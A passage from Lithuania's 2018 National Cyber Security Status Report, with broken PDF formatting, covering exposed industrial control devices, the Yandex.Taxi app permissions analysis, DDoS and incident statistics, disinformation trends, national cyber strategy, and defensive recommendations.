exists a possibility that the link with the Internet can be created, for example, by connecting in an isolated
network a mobile device that was or is connected to the Internet. In 2018, the most searched devices
were those that use BACnet, Siemens S7, Modbus, Niagara Tridium Fox protocols (fig. 17).
Ener
gy
Gov
ernm
ent
Nat
iona
l def
ence
Fina
nce
Agric
ultu
re
Tran
spor
t
Publ
ic se
curit
y an
d le
gal o
rder
Fore
ign
affai
rs a
nd se
curit
y po
licy
Envi
ronm
ent
Oth
er
Wat
er su
pply
IT a
nd e
lect
roni
c co
mm
unic
atio
ns
Publ
ic a
war
enes
s
Fig. 16. Critical services‘ Electronic Communications Network Reconnaissance by sectors
Fig. 17. 2018 reconnaissance statistics of devices used in technological processes by protocols and / or equip-
ment manufacturers in the CIS of SIR and CII managers
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 32 ] [ 33 ]
67%
13%
8%
8%
2%
2%
Modbus
Tridium Fox
Moxa Nport
Siemens S7
BACnet
Others
No Threat Recommended ways to manage threat
1.Attacker identifies active ser-vices and devices.
Change device ports to less frequently used, disable un-used ports, enable reverse proxy to prevent the identifi-cation of active services and hardware or software from outside.
1
In order to find out how many devices that control technological processes are connected to the Internet
in Lithuania, the NCSC performed an analysis, which identified 486 devices that control the technological
processes. The survey found that 67% of devices that are directly connected to the Internet are controlled
by Modbus protocol (fig. 18). For example, such controllers can be used by home users to remotely con-
trol home heating, conditioning or alarm systems. It should be noted that such devices are not always
updated, thus allowing individuals with wicked intent to connect to devices after exploiting known vul-
nerabilities, to intercept and / or disrupt their control.
Fig. 18. Manufacturers and / or communication protocols of devices involved in technological processes and
accessible via the Internet
Table 15. Mitigating threats of Electronic Communications Network Reconnaissance
Reliability of contractors and software
Mobile apps often ask for excess data or full access to device functionality.
Fig. 19. Classification of threat of reliability of contractors and software by Lockheed Martin “Cyber Kill Chain“
model
A study by the NCSC on the origin of software in Lithuanian public sector institutions, which summa-
rized results were published in 2017 National Cyber Security Status Report, led to decisions taken by the
Government on the removal of Kaspersky Lab software in the systems of SIR managers and handlers,
and of the CII managers. The problem of the reliability of contractors and / or software and hardware
continued to be raised in 2018 both in national media and by initiatives of individual entities apply-
ing to the NCSC. The NCSC initiated analysis of Yandex. Taxi mobile app, which revealed that the app
requests excess data, requires access to a large amount of personal data and permission to use device
features: the possibility to activate the camera and microphone (to record user environment), to use
the contact list (this is a possibility to get information of the phone book, accounts used), to manage
calls, to identify device identity and operational status, manage text messages (this is a possibility to
intercept messages received), to modify content stored in the smart device memory, to determine the
Reconnaissance Weaponization Delivery Exploitation InstallationCommand and Control
Actions on objective
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 34 ] [ 35 ]
No Threat Recommended ways to manage threat
1.Data leakage and / or disruption of services.
It is recommended to purchase hardware and software only from official sources and suppliers that operate un-der the General Data Protection Regulation and protect data in NATO or EU countries, to limit the hardware or software functionality and availability of information and services (for example, disable the ability to record sound, activate the camera on the smartphone, and prevent any technological network connection with the Internet in the organization).
2. Spying.
It is recommended to purchase hardware and software from sources that are of good repute, and there is no risk concerning cooperation with non-NATO and non-EU for-eign intelligence services.
3.Unauthorized technological network connection with the Internet.
Provide limited access to CIS for contractors, by avoiding giving remote access to CIS, monitor and audit commu-nication logs.
1
2
3
exact (GPS) location of the device, to manage network access (to send data via Internet, monitor and
manage network connections, manage Wi-Fi access (fig. 20). Yandex. Taxi mobile app also maintains
active connection with 10 IP addresses in Moscow and Yekaterinburg servers, thus allowing person-
al data to leak beyond EU jurisdiction, where personal data regulation is not in line with the EU stan-
dards7. The app can establish connection via these addresses (which, based on geolocation IP data-
base information, are located in different regions) regardless of whether it is in standby or active mode.
Fig. 20. Access to smartphone services and information requested by Yandex.Taxi app
Fig. 21. Information on Yandex.Taxi communications that was found during the NCSC study
The NCSC notes that, despite the safe software code, mobile apps often ask for excess data or access to
device functionality. Users usually provide such access and agree to the terms of use of apps without
thinking that their data, unrelated to the service provided by the software (such as communication data,
device microphone records, photo gallery, etc.) may be leaked or accessible to third parties without their
knowledge and consent.
The reliability of contractors and / or software is also closely linked to public procurement procedures.
Due to lack of expertise or underestimation of threats, the hardware or software purchased by the parties
during the public procurement that is organised according to the lowest price principle is not always the
safest. In order to disrupt provision of critical services, individuals with wicked intent also often target
7 https://www.nksc.lt/naujienos/nacionalinis_kibernetinis_saugumo_centras_rekomend.html
suppliers because in this way the infrastructure separated from the Internet can be accessed directly. An
example of this are upgrades of equipment in technological networks, when a contractor, who connects
a laptop with a possibility of mobile connection to a device on a technological network, enables an unau-
thorized technological network connection with the Internet. This makes it possible to spread malicious
code on an isolated network, and given that updates on technological networks are not implemented
immediately after they appear, malicious code does not necessarily needs to be the most advanced, be-
cause there are cases where servers with an outdated Windows XP OS with vulnerabilities is detected in
the infrastructure of technological networks.
Table 16. Mitigation of threats related to the reliability of contractors
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 36 ] [ 37 ]
35000
30000
25000
20000
15000
10000
5000
0
2015
18427
2016
20490
2017
24612
2018
29747
DDoS cyber incidents and equipment vulnerabilities
A relatively small number of electronic service in-terference attacks was registered (31 case).
The trend shows that the number of devices with vulnerabilities is increasing, thus it is a real threat that these devices can be included in Botnet and used for DDoS cyber attacks.
Reconnaissance Weaponization Delivery Exploitation InstallationCommand and Control
Actions on objective
Cyber incidents of electronic service disruption are mostly carried out to disrupt access to CIS services.
DDoS attacks are usually caried out using botnets (fig. 22).
Fig. 22. Classification of cyber incidents of electronic service disruption by Lockheed Martin “Cyber Kill Chain“
model
In 2018, the NCSC registered 31 DDoS attack. By their importance, 20 of them were classified as medium.
DDoS attacks were directed at the availability of services provided by the CIS of the Ministry of the Interi-
or, SE Center of Registers, as well as by the CIS of the Seimas of the Republic of Lithuania.
It should be noted that the number of devices with vulnerabilities has increased. Such devices can be
overtaken and included to Botnet, i.e. they can be used for DDoS attacks. In 2018, the NCSC captured
28,630 devices with vulnerabilities. Compared to previous years, this trend is increasing by one fifth each
year from 2015 onwards (respectively, 18,427 devices were captured in 2015, in 2016 – 20,490 devices,
and in 2017 – 24,612 devices, fig. 23).
The increase in the number of devices with vulnerabilities is related to IoT that rapidly gains its popularity.
Fig. 23. Trend of devices with vulnerabilities in 2015 – 2018
Table 17. Mitigation of threats related to device vulnerabilities.
No Threat Recommended ways to manage threat
1.Default passwords are used to connect to the device.
Change the default passwords of the devices.
2. The device is connected through a non-prevented vulnerability.
Regularly update IoT application and software.
3.Attacker can see passwords and other sensitive informa-tion stored in the device.
Disable the possibility to save passwords on your device.
4.Attacker can intercept infor-mation or passwords during device communication.
Purchase and use devices with communication session being encrypted.Useencryption for the communications of the device.
5.Attacker takes advantage of the exess functions of the de-vice and gains access to CIS.
Wherever possible, it is necessary to check whether or not the device supports excessive functionality (open ports).
6.The device communicates with the outside and, possi-bly, leaks information.
Before purchasing a device, make sure that its manu-facturer meets the requirements of the General Data Protection Regulation or that the data sent is protected by EU law.
7.An insecure device is ac-quired.
Avoid unknown manufacturers whose country of origin and reliability are difficult to check.
1
2
3
4
5
6
7
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 38 ] [ 39 ]
Cyber attack
Information attack
Cyber attack
“TV3” website is hacked
a fake article is published on”TV3” website
by simulating “TV3” e-mail address letters are sent that were created using social engineering methods with an attachment containing a malicious code
Notable cyber incidents
In 2018, notable cyber incidents in Lithuania were associated with hybrid threats; where cyber at-tacks were matched to information warfare.
Reconnaissance Weaponization Delivery Exploitation InstallationCommand and Control
Actions on objective
Notable cyber incidents of 2018 were related to the detection of vulnerabilities in CIS, malware, overtaken
devices and malicious actions in CIS.
Fig. 24. Classification of notable cyber incidents by Lockheed Martin “Cyber Kill Chain“ model
In 2018, the NCSC captured cyber incidents of high significance, when cyber security entities were dis-
covered to have an advanced persistent threat, related to foreign intelligence activities, that was running
for a long time. Cyber incidents, which by their nature are related to information attacks and exploiting
known vulnerabilities, were the incidents that most often created resonance in the society, although
due to their limited impact they are not classified as high impact or dangerous cyber incidents by their
significance.
In 2018, cyber incidents based on social engineering methods, which were correlated with informational
attacks, were also monitored (fig. 25). As an example can be mentioned cyber incident of “TV3” website in
2018. In the process, after an account of website administrator was overtaken, a counterfeit scandalous
article was published. Right after that a spoofed TV3‘s email address letters were sent to the target audi-
ence with a document that contained a malicious code to infiltrate other CISs.
Fig. 25. Steps of cyber and information attacks during cyber attack
An important and notable cyber incident in 2018 was related to the disclosure of the vulnerability of
“e-sveikata“ information system. The person who used the programming error publicly disclosed the vul-
nerability and got access to the personal data. This incident raised a problem of responsible information
disclosure, when third parties, instead of responsible institutions, are informed about the vulnerabilities.
By publicizing vulnerabilities of information systems and / or ways of exploiting them may create condi-
tions for individuals with wicked intent to access personal data that is stored on CIS. The NCSC notes that
when a security vulnerability is detected, the system manager and the NCSC should first be informed
thereof, not to attempt to exploit the security vulnerability in the affected system, not to attempt to
modify the data or otherwise affect it or try to exploit vulnerabilities.
At the end of 2018, a targeted spam distribution campaign against public authorities, government rep-
resentatives, and public figures, that disturbed e-mail service accessibility by filling e-mail inboxes of
addressees with thousands of unwanted e-mails, was conducted.
The cyber attack was carried out in an automated way by including individuals‘ e-mail addresses in vari-
ous promotional newsletter subscriptions whose senders were not necessarily malicious. The NCSC pro-
vides guidance on how to protect against cyber incidents of this kind.
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 40 ] [ 41 ]
Information attacksINFORMATION ATTACKS
2,456 cases of information attacks were identified, 29% of them in the area of defence.
The Department of Strategic Communication of Lithuanian Armed Forces conducts analysis of events,
processes them and assess trends related to the activity of Internet users in Lithuania and other countries
in cyber space. The main focus is on the review of the most important cases of the flow of negative in-
formation directed against the Lithuanian society during the year, i.e. disinformation, manipulation, fake
news and propaganda.
Due to globalization and the evolution of information technology, many countries in the world, that have
a different attitude towards democratic values, are united in a common cyberspace where the bound-
aries of data exchange are narrow or non-existent. This creates conditions for information operations
to affect the natural development process of democratic states, by manipulating their public opinion
with help of counterfeit and provocative news, digital entertainment products, conduct cyber attacks in
order to keep individuals from information or to distort its content, using robots on social networks and
in comments, and hired opinion formers who fuel war and promote national, racial, religious and social
difference dissension.
In 2018, the largest source of negative information in Lithuania was the media controlled by the Gov-
ernment of the Russian Federation and the activities of information channels indirectly related to it and
operating in the territory of Lithuania. News portals, social networking users, and television, that are
linked to the Kremlin and its regime, in conducting information attacks, were guided by the long-term
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 42 ]
180
160
140
120
100
80
60
40
20
0January February March April May June July August September October November December
20
18
ME
TŲ
NA
CIO
NA
LIN
IO K
IBE
RN
ET
INIO
SA
UG
UM
O B
ŪK
LĖ
S A
TA
SK
AIT
A
[ 43 ]
23%
29%
18%
16%
8%6%
trends in media consumption habits in Lithuania and acted purposefully. As in previous periods, the main
directions of information activities carried out by Russia remained unchanged and were mainly focused
on escalating issues of strategic importance and those that are socially sensitive to Lithuania, such as his-
torical memory or socio-economic problems. The purpose of these topics reflects the long-term strategic
interests of the Russian Federation and the aspirations to maintain control of its information space and
influence in the information areas of other states, i.e. to have political, economic, informational and other
leverages on their internal processes‘ agenda.
The total of 2,456 cases of unfriendly information activities were identified last year (or an average of
about 205 per month). Their percentage of distribution by strategically important areas: defence - 29%;
protection of constitutional foundations - 23%; culture and education - 18%; foreign policy - 16%; econ-
omy and energy - 8%; social security – 6% (Fig. 26).
Defence
Protection of constitutional foundations
Culture and education
Foreign policy
Economy and energy
Social security
Fig. 26. Concentration of negative information in respect of strategic areas in 2018
The most intense negative information activity was captured in the area of defence (almost one third of
all cases). Also, a large number of cases were divided between protection of constitutional foundations,
culture and education, and foreign policy. Slightly less propaganda occurred in the areas of economy and
energy, and social security. However, it would be wrong to assume, for example, that social security issues
were less important than those related to defence. It is worth emphasizing that propaganda on every
topic was understood individually, but unrelated to the overall picture, and the assessment of its damage
was not limited to quantitative expression (for example, in October social issues were much more im-
portant than those of defence, but their incidence in the total flow was quantitatively less than of those
related to defence). Taking into account the activity of propaganda, January, April, June, and October, the
months when the most unfriendly information activities were identified, can be distinguished (fig. 27).
This coincided with significant foreign policy and domestic events that were attempted to be used by
sources of information that are unfriendly to Lithuania. Thus to form a negative image of the country in
the West, and encouraged mutual opposition between Lithuanian public audiences.
Defence
Protection of constitutional foundations
Culture and education
Foreign policy
Economy and energy
Social security
Fig. 27. Dynamics of negative information flow in respect of the state‘s strategic areas in 2018
The most striking example of such action in Lithuania: in June, during military exercise “Saber Strike
2018“, information was published on the website gelezinisvilkassite.wordpress.com that a child was killed
during an accident in which the US military armored vehicle “Stryker“ were involved (fig. 28).
Fig. 28. Fake news – the child was claimed to be killed during the road accident in which the US military vehicle
“Stryker“ were involved (June 2018)
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 44 ] [ 45 ]
INCREASING CYBER SECURITY RESISTANCE
Organizing cyber security
In 2018, the Government of the Republic of Lithu-ania approved the National Cyber Security Strate-gy, identifying the key directions of the national cyber security policies in public and private sec-tors until 2023.
The decision was made to develop a secure na-tional data transmission network that connects institutions ensuring vital functions of the state (hereinafter referred to as the Secure network).
The first Lithuania‘s National Cyber Security Strategy was approved in 2018. It is an essential document
in which, taking into account the conclusions of the environmental analysis, Lithuanian and European
Union legislation, good practices of other countries and suggestions of public and private sector repre-
sentatives, the five-year goals and tasks in the area of cyber security have been set for public and private
sectors, Lithuanian science and study institutions. The strategy aims to strengthen the state‘s cyber secu-
rity and development of cyber defence capabilities, to ensure prevention, repression and investigation
of criminal offenses, to promote cyber security culture and innovation development, to strengthen close
public and private sector, international cooperation and to ensure the implementation of international
obligations.
At the same time, the criteria for evaluating the implementation of the strategy and their implications
to be achieved were approved, and the strategy itself will be implemented through inter-institutional
action plans which set out the measures for implementing the strategy and the funds for their imple-
mentation. In 2018, consolidation of national cyber security functions and capabilities that was started
in mid-2017 was also completed, i.e. the functions of information resources security, electronic commu-
nications networks and information security, and of cyber security policy formation and implementation
were merged, and transferred to the Ministry of National Defence.
In 2018, new version of the Cyber Security Law provisions was introduced, amendments to the Code
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 46 ] [ 47 ]
of Administrative Offenses of the Republic of Lithuania were adopted, and the provisions of legal acts
implementing the Cyber Security Law were updated. All these legislative changes were made not only
to transpose Directive (EU) 2016/1148 of the European Parliament and Council of 6 July 2016 concerning
measures for a high common level of security of network and information systems across the Union , but
this has also made it possible to improve the organization and control of the cyber security system, to
clarify the functions of cyber security policy-making and implementing bodies, the obligations and re-
sponsibilities of cyber security entities, and to establish additional measures for ensuring cyber security.
Following the change of the egislation, the NCSC‘s competence was expanded, giving more rights to
control and supervise cyber security entities.NCSC‘s responsibilities now are not limited to supervision as
it also acts as an authority that controls cyber security entities at national level and applies administrative
responsibility to entities.
In 2018, the General Data Protection Regulation (EU) 2016/679 on the protection of personal data and on
the free movement of such data was adopted (hereinafter referred to as the Regulation). In order to avoid
the liability applied by the State Data Protection Inspectorate for non-compliance with the provisions of
the Regulation, organizations started to manage their IT infrastructure more actively, i.e. they not only
began to regulate the use of personal data in their activities, but also started planning and implementing
cyber security measures to protect personal data.
In order to raise the level of cyber security status in Lithuania, in the second half of 2018, the Ministry of
National Defence prepared an amendment to the Law on the Management of State Information Resourc-
es, and proposed to impose an obligation on the State and municipal institutions and bodies, that carry
out national mobilization tasks for vital state functions to be performed, to use the Safe network. The
Secure network would be separated from public communications networks and could operate in crisis or
war conditions. The aforementioned law was adopted by the Seimas of the Republic of Lithuania on 20
December 2018. The implementation of this law will allow not only to ensure faster and more effective
response to cyber incidents, but also to save resources allocated to cyber security as the assurance of
cyber security will be centralized, conditions for more effective use of measures of collective defence will
be created.
Creating a cyber security environment
In 2018, the Ministry of National Defence and the NCSC signed an agreement with the media.
In 2018, the Ministry of National Defence, in co-operation with the partners, began establishing a Regional Cyber Security Center in Kaunas.
In 2018, Lithuania started implementing the Eu-ropean Union Permanent Structured Cooperation Project „Cyber Rapid Response Teams and Mutual Assistance in Cyber Security“, which was initiated in 2017.
Cyber incidents are increasingly disturbing not only the public and private sectors, but also the media,
which plays an important role in developing a secure cyber space and objectively informing the Lithua-
nian population. On 28 August 2018, the Ministry of National Defence, together with the NCSC and the
largest Lithuanian news portals and agencies, signed a cooperation agreement, the main objective of
which is to enhance cooperation in the area of cyber security, to strengthen cyber security of the mass
media and resistance to cyber threats. In the course of the implementation of the provisions of the coop-
eration agreement, on 23 October 2018 the Cyber security training for journalists was held at Grand Duke
Gediminas Staff Battalion of the Lithuanian Armed Forces. Journalists learned how to critically evaluate
cyber space, to recognize cyber threats and to deal with cyber incidents.
Since 2018, the Ministry of National Defence initiated works of the establishment of a Regional Cyber
Security Center. The aim of this future center is to increase Lithuania‘s cyber-resistance, in cooperation
with partners to strengthen the ability of Lithuanian cyber defence specialists to timely recognize and
prevent cyber incidents in our region.
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 48 ] [ 49 ]
Training for media representatives. Photo by Ieva Budzeikaitė
In order to strengthen the European Union‘s cyber security and defence capabilities, and to more effec-
tively manage cyber incidents across national borders, it is necessary to cooperate with other European
Union countries. In 2017, the Ministry of National Defence of the Republic of Lithuania initiated (led by
Edvinas Kerza, the Vice-Minister of National Defence) the European Union Permanent Structured Cooper-
ation Project „Cyber Rapid Response Teams and Mutual Assistance in Cyber Security“ (hereinafter referred
to as the PESCO Project) which was launched in February 2018. The aim of the project is to pool and
utilise cyber defence capabilities, knowledge and competences of the Member States. Thirteen countries
are participating in the PESCO project, eight countries are the members of this project (Estonia, Spain,
Croatia, Lithuania, Poland, Netherlands, Romania, Finland), five countries act as observers (Belgium,
France, Greece, Slovenia, Germany). On 25 June 2018, six Member States signed a Memorandum of Un-
derstanding on a Cyber-Rapid Response Force and Mutual Assistance in Cyber Security at the meeting of
the European Union Foreign Affairs Council in Luxembourg. On 24 November 2018, Poland joined other
signatories - Lithuania, Estonia, Spain, Croatia, the Netherlands and Romania. By means of the memoran-
dum, the countries expressed the political will to seek closer cooperation under the project. Cyber Rapid
Response Teams (hereinafter referred to as the teams) will help each other to ensure a higher level of cy-
ber-resistance and will respond jointly to cyber incidents. Teams composed of cyber experts from differ-
ent European Union countries will change, they will keep on the watch every six months. Teams will also
be able to assist other Member States and European Union institutions, in carrying out joint security and
defence policy operations and partner countries. Member States are also working together to develop a
common set of cyber tools to be used by watch-keeping teams. Leaders of this project, Tadas Šakūnas and
Eglė Vasiliauskaitė, have also prepared a legal and political cyber-rapid response force memo, which can
be used by the project participants and other countries that would like to join the project in the future.
Legal and political cyber-rapid response force memo, 2019
It is important to improve the competence of cyber security professionals - constantly testing their skills
in practice. For this reason, cyber security entities and the NCSC regularly participates in international
cyber security exercises, such as Locked Shields 2018, Cyber Europe 2018 and Cyber Coalition 2018. It is
noteworthy that last year, all of them simulated cyber attacks against critical infrastructure, emphasized
interdependence, developed skills for escalation, threat management and attribution of cyber attacks.
However, the most important was the exercise Cyber Shield 2018, which was organized in 2018 together
with the exercise of the Lithuanian Armed Forces Amber Mist 2018. During this exercise, cyber security
entities not only improved their skills to recognize cyber incidents and to inform the competent author-
ities about them, but also team call procedures have been tested in practice, during which the project
participants evaluated in real time how to provide assistance to Lithuania. Experience gained during the
exercise has been transferred to the memos of call for rapid response forces.
Cyber security exercise Cyber Shield 2018. Photo by Giedrė Maksimovicz
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 50 ] [ 51 ]
100%
90%
80%
70%
60%
50%
40%
30%
20%
10%
0%
34% 44%
32%
47%
50%
13%24%
63%
3% 3%
50%
37%
CII managers SIR managers and handlers
Organisational requirements Technical requirements
CII managers SIR managers
Cyber security entities also continued to improve cyber security status by implementing organizational
and technical cyber security requirements set by the Government of the Republic of Lithuania. It should
be noted that there has been good progress in implementing the requirements of the CII managers -
these entities implemented 63% of organizational and 50% of technical cyber security requirements (last
year, the CII managers implemented only 26% of organizational and 6% of technical cyber security re-
quirements) (fig. 29). Most entities that have not implemented the requirements plan to implement them
in the future (by 1 January 2021 at the latest). As in 2017, lack of expertise, financial and human resources
are identified by the managers and handlers as the main reasons that prevent the implementation of the
requirements. They also emphasize that the requirements are too strict.
Fig. 29. Organizational and technical cyber security requirements implementation of CII and SIR managers
(2018)
Implemented all requirements
Implemented some of the requirements
Have not implemented the requirements or failed to provide information
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 52 ] [ 53 ]
CONCLUSIONS AND RECOMMENDATIONS
Conclusions
1. The country‘s cyber security policy is systematically implemented by decisions of the
Government of the Republic of Lithuania. In 2018 the National Cyber Security Strategy has
been approved. Key directions for the cyber security development in the public and private sec-
tors were set up for the period until 2023. The consolidation of cyber security in Lithuania was
also completed, and the decision was made to create a Secure National Data Transmission Net-
work that will connect institutions ensuring vital functions of the state.
2. The number of cyber incidents decreased, but attacks have become more sophisticat-
ed. In the year of 2018, 53,183 cyber security incidents were registered in Lithuania, i.e. 3% less
than in 2017. However, cyber incidents have become more complex, attacks are becoming more
sophisticated and it is impossible to investigate them by automated means. The NCSC investi-
gated 914 cyber incidents of high and medium significance, that is 41% more than in 2017.
3. The greatest cyber security threats are due to the high number of vulnerabale devic-
es connected to the Internet, vulnerable websites and the use of social engineering
methods. In 2018, the NCSC registered 21% rise of the devices with vulnerabilities. Half of the
52,000 identifiable websites with CMS in Lithuania are vulnerable, entities still do not regard IT
services and information stored in CIS as assets. In 2018, the NCSC captured 25% more than in
2017 attempts to infiltrate into communications and information systems based on Social Engi-
neering methods.
4. Critical Information Infrastructure is an object of active malicious cyber activity. In
2018, most of malware was detected in government (39% in total), energy (20%), and foreign
affairs and security policy (19%) sectors. Last year, the activity of electronic communications
network scanning increased by 18 %, when energy, government and national defence sectors
received most interest.
5. Information warfare is mostly directed to the defence sector. In 2018, negative informa-
tion activities were targeted at the most important areas of Lithuanian national security. Com-
pared to 2017, the overall negative information flow observed in the Lithuanian information
space remained stable and high. 2,456 cases of information attacks were identified, 29% of them
in the area of defence.
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 54 ] [ 55 ]
Recommendations
Basic ways of managing social engineering threats
1. Move a mouse cursor over the link and check that the website address you are displaying is
genuine, make sure that the address does not contain grammatical errors, the address name is
logical and easy to read.
2. Make sure the session with the website is encrypted, i.e. a SSL certificate is used (the website
address must begin with the https tag), use multi-factor authentication tools (such as password,
mobile device, fingerprint).
3. Protect your login passwords by no means keeping them open at work, on your computer, or on
your mobile phone.
4. Be critical about online ads and those sent by e-mail (especially be critical about big discounts
offered); check requests to make cash remittances by other means, for example, verify the cir-
cumstances by phone call.
5. Do not open document content, files being sent, and software that have been sent or download-
ed from an unreliable source (for example, from sources of illegal software distribution).
6. Do not make precipitous actions, avoid emotions, fully clarify the necessity of the actions re-
quested.
Mitigation of malware threats
1. Use legal OS and software, use antivirus software, use it for preventive scanning of data on your
device, instantly install manufacturer‘s software updates after they appear.
2. Do not download files from unreliable sources, install plugins in your browser to identify mali-
cious websites, use antivirus software to scan suspicious files downloaded, check them using the
tools of the NCSC* .
3. Do not use unreliable, unverified memory drives or other devices that connects via USB stick.
Constantly format them, disable automatic file execution.
4. Back up your data periodically, keep backup copies separately (for example, on an external stor-
age device).
5. Encrypt confidential information, protect it with a secure password. Use cryptographic tools to
transmit information, such as email encryption.
6. Use network segmentation, several filtering tools (such as network and workstation firewall),
physically separate important CISs.
Mitigation of vulnerable websites
1. Change the login addresses of the website CMS administrator and users, periodically change
passwords, enable limited number of attempts to login.
2. Constantly update OS of the server, CMS and related plugins, do not use unnecessary CMS
plugins, use web application firewall, close unused ports, scan website for vulnerabilities, and
regularly check logs for unauthorized access or other, install a “reverse proxy“ solution to pre-
vent the attacker to identification of CMS.
3. Configure firewalls in a way that CMSs of websites could be only logged in from reliable IP ad-
dresses (white lististing of the IP addresses).
4. When website development, embedding and maintenance services are purchased, the contract
should include a requirement for the service provider to ensure the cyber security of the web-
site, protection against hacking, to ensure the compliance of the website with the organization-
al and technical cyber security requirements established by the Government.
5. Install a SSL certificate on a website that will secure the encrypted connection. It is one of the
most effective cyber security tools for websites.
6. Use web application firewall, order more bandwidth, purchase additional preventive DDoS ser-
vices, for example, from a website hosting provider.
Mitigating threats of Electronic Communications Network Reconnaissance
1. Change device ports to less frequently used, disable unused ports, enable reverse proxy to pre-
vent the identification of active services and hardware or software from outside.
Mitigation of threats related to the reliability of contractors
1. It is recommended to purchase hardware and software only from official sources and suppli-
ers that operate under the General Data Protection Regulation and protect data in NATO or EU
countries, to limit the hardware or software functionality and availability of information and ser-
vices (for example, disable the ability to record sound, activate the camera on the smartphone,
and prevent any technological network connection with the Internet in the organization).
* https://www.nksc.lt/irankiai.html
20
18
NA
TIO
NA
L C
YB
ER
SE
CU
RIT
Y S
TA
TU
S R
EP
OR
T
[ 56 ]
2. It is recommended to purchase hardware and software from sources that are of good repute,
and there is no risk concerning cooperation with non-NATO and non-EU foreign intelligence
services.
3. Provide limited access to CIS for contractors, by avoiding giving remote access to CIS, monitor
and audit communication logs.
Mitigation of threats related to device vulnerabilities.
1. Change the default passwords of the devices.
2. Regularly update IoT application and software.
3. Disable the possibility to save passwords on IoT devices.
4. Purchase and use devices with communication session being encrypted.
5. Wherever possible, it is necessary to check whether or not the device supports excessive func-
tionality (open ports).
6. Before purchasing a device, make sure that its manufacturer meets the requirements of the Gen-
eral Data Protection Regulation or that the data sent is protected by EU law.
7. Avoid unknown manufacturers whose country of origin and reliability are difficult to check.